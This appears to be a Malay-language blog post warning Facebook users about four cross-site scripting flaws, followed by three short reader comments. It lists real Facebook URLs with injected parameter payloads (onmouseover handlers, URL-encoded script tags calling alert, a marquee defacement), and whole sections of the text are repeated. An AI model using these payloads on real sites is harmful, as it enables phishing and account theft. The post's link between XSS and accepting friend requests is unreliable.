Kepada Semua Pengguna FACEBOOK. Perhatian!!!!!
Di zaman siber yang serba canggih ini, hampir semua umat manusia seluruh dunia mempunyai akaun Facebook. Tetapi ada agenda yang masih kita belum tahu di facebook.Disini ada penemuan baru dari beberapa orang hackers di Malaysia.
Empat kelemahan XSS yang cukup kritikal ditemui oleh hacker's di Facebook
Semua pengguna Facebook tidak sedar akan serangan pencurian ID & phishing module kerana kelemahan cross-site scripting terkini yang amat kritikal telah ditemui oleh para hackers.
Kaji selidik yang saya jalankan bersama beberapa rakan, baru-baru ini pengguna Facebook sering diserang melalui kecacatan sistem XSS didalam aplikasi facebook yang mempengaruhi beberapa fungsi utama iaitu :
Semua pengguna Facebook tidak sedar akan serangan pencurian ID & phishing module kerana kelemahan cross-site scripting terkini yang amat kritikal telah ditemui oleh para hackers.
Kaji selidik yang saya jalankan bersama beberapa rakan, baru-baru ini pengguna Facebook sering diserang melalui kecacatan sistem XSS didalam aplikasi facebook yang mempengaruhi beberapa fungsi utama iaitu :
- halaman developer,
- halaman pendaftaran user baru,
- halaman iphone login
- dan
- halaman untuk aplikasi tambahan.
Perhatian:
Sebagai langkah berjaga-jaga, anda dinasihatkan tidak menerima apa-apa 'friend invitation' dari pengguna yang anda curigai /tidak dikenali.
Para teman yang 'tidak diundang' ni akan menyuntik beratus malahan beribu kuman pengiklanan untuk menjana keuntungan dari aspek "pengiklanan haram" yang mereka jalankan.
Malah lebih teruk,segala data-data peribadi & rakan2 anda dengan mudah dicuri-pakai untuk kepentingan "hackers" ini.
Jangan terkejut, frontpage facebook anda juga boleh diubahsuai menjadi sebuah laman lucah/memalukan dengan amat mudah sekali.
Quote:Hackers dengan mudah dapat mengeksploitasi kecacatan (bugs) XSS ini untuk menyuntik jutaan pengguna facebook dengan kuman jenis malware, adware dan spyware.
Sebagai langkah berjaga-jaga, anda dinasihatkan tidak menerima apa-apa 'friend invitation' dari pengguna yang anda curigai /tidak dikenali.
Para teman yang 'tidak diundang' ni akan menyuntik beratus malahan beribu kuman pengiklanan untuk menjana keuntungan dari aspek "pengiklanan haram" yang mereka jalankan.
Malah lebih teruk,segala data-data peribadi & rakan2 anda dengan mudah dicuri-pakai untuk kepentingan "hackers" ini.
Jangan terkejut, frontpage facebook anda juga boleh diubahsuai menjadi sebuah laman lucah/memalukan dengan amat mudah sekali.
Disini saya sertakan info tentang kecacatan XSS yang diguna-pakai oleh para hackers:
XSS #1
http://www.new.facebook.com/r.php
Kecacatan >> reg_email__="onmouseover="alert('XSS - ZJ')"foo="bar
XSS #2
https://login.facebook.com/login.php?iph...one.fac...
Kecacatan >> email=biz%22%3E%3Cscript%3Ealert%28%27tohellwithgeorgia%27%29%3C%2Fscript%3E%3C% 22&pass=greetz2evilghost&next=http%3A%2F%2Fiphone.facebook.com%2F&login=Login
XSS #3
http://apps.facebook.com/blognetworks/se.../script%3E
Kecacatan ini amat berkesan pada kebanyakan IP diMalaysia tetapi ianya tidak boleh digunakan untuk (worms) kecuali untuk tujuan "Phishing" (sistem pengeliruan) sahaja.
XSS #4
http://developers.facebook.com/tools.php?fbml
Kecacatan >> profile=1299125444&position=wide&api_key=%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3E %3Cmarquee%3E%3Ch1%3EXSS+by+p3lo%3C%2Fh1%3E%3C%2Fmarquee%3E+&fbml=
*Sekali lagi nasihat saya, jangan sesekali menerima "friend invite" "friend request" demi keselamatan facebook anda.
**setakat ini tiada cara penyelesaian untuk saranan...hanya menanti Facebook meng"update" kecacatan2 diatas baru lah penggunaan Facebook anda selamat dari ancaman serangan.
XSS #1
http://www.new.facebook.com/r.php
Kecacatan >> reg_email__="onmouseover="alert('XSS - ZJ')"foo="bar
XSS #2
https://login.facebook.com/login.php?iph...one.fac...
Kecacatan >> email=biz%22%3E%3Cscript%3Ealert%28%27tohellwithgeorgia%27%29%3C%2Fscript%3E%3C% 22&pass=greetz2evilghost&next=http%3A%2F%2Fiphone.facebook.com%2F&login=Login
XSS #3
http://apps.facebook.com/blognetworks/se.../script%3E
Kecacatan ini amat berkesan pada kebanyakan IP diMalaysia tetapi ianya tidak boleh digunakan untuk (worms) kecuali untuk tujuan "Phishing" (sistem pengeliruan) sahaja.
XSS #4
http://developers.facebook.com/tools.php?fbml
Kecacatan >> profile=1299125444&position=wide&api_key=%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3E %3Cmarquee%3E%3Ch1%3EXSS+by+p3lo%3C%2Fh1%3E%3C%2Fmarquee%3E+&fbml=
*Sekali lagi nasihat saya, jangan sesekali menerima "friend invite" "friend request" demi keselamatan facebook anda.
**setakat ini tiada cara penyelesaian untuk saranan...hanya menanti Facebook meng"update" kecacatan2 diatas baru lah penggunaan Facebook anda selamat dari ancaman serangan.
3 comments:
salam..
info yg berguna..thanks sharing!
nice info!
thanks for the tips
aku paham jgn terima invite org x kenal tuh ja
laen tak paham
haha
Post a Comment